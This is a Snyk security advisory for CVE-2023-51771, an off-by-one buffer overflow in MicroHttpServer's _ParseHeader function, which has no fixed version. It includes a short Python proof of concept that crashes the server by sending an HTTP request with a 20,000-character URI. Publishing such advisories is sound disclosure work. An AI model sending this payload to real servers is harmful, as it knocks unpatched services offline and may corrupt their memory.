Off-by-one Error Affecting starnight/MicroHttpServer package, versions [0,]


Severity

Recommended
0.0
high
0
10

CVSS assessment made by Snyk's Security Team. Learn more

Threat Intelligence

Exploit Maturity
Proof of concept
EPSS
0.14% (51st percentile)

Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications
  • Snyk IDSNYK-UNMANAGED-STARNIGHTMICROHTTPSERVER-6139268
  • published25 Dec 2023
  • disclosed25 Dec 2023
  • creditHalcy0nic

Introduced: 25 Dec 2023

CVE-2023-51771  (opens in a new tab)
CWE-193  (opens in a new tab)

How to fix?

There is no fixed version for starnight/MicroHttpServer.

Overview

Affected versions of this package are vulnerable to Off-by-one Error in the _ParseHeader function. An attacker can cause a buffer overflow by sending a request with a long URI.

PoC

import socket

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect(("localhost", 8001))
sock.send(b"GET "+b"?"*20000+b"HTTP/1.1\r\nHost: localhost:8080\r\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nDNT: 1\r\nConnection: close\r\nUpgrade-Insecure-Requests: 1\r\nSec-Fetch-Dest: document\r\nSec-Fetch-Mode: navigate\r\nSec-Fetch-Site: none\r\nSec-Fetch-User: ?1\r\n\r\n\r\n")
response = sock.recv(4096)
sock.close()

CVSS Scores

version 3.1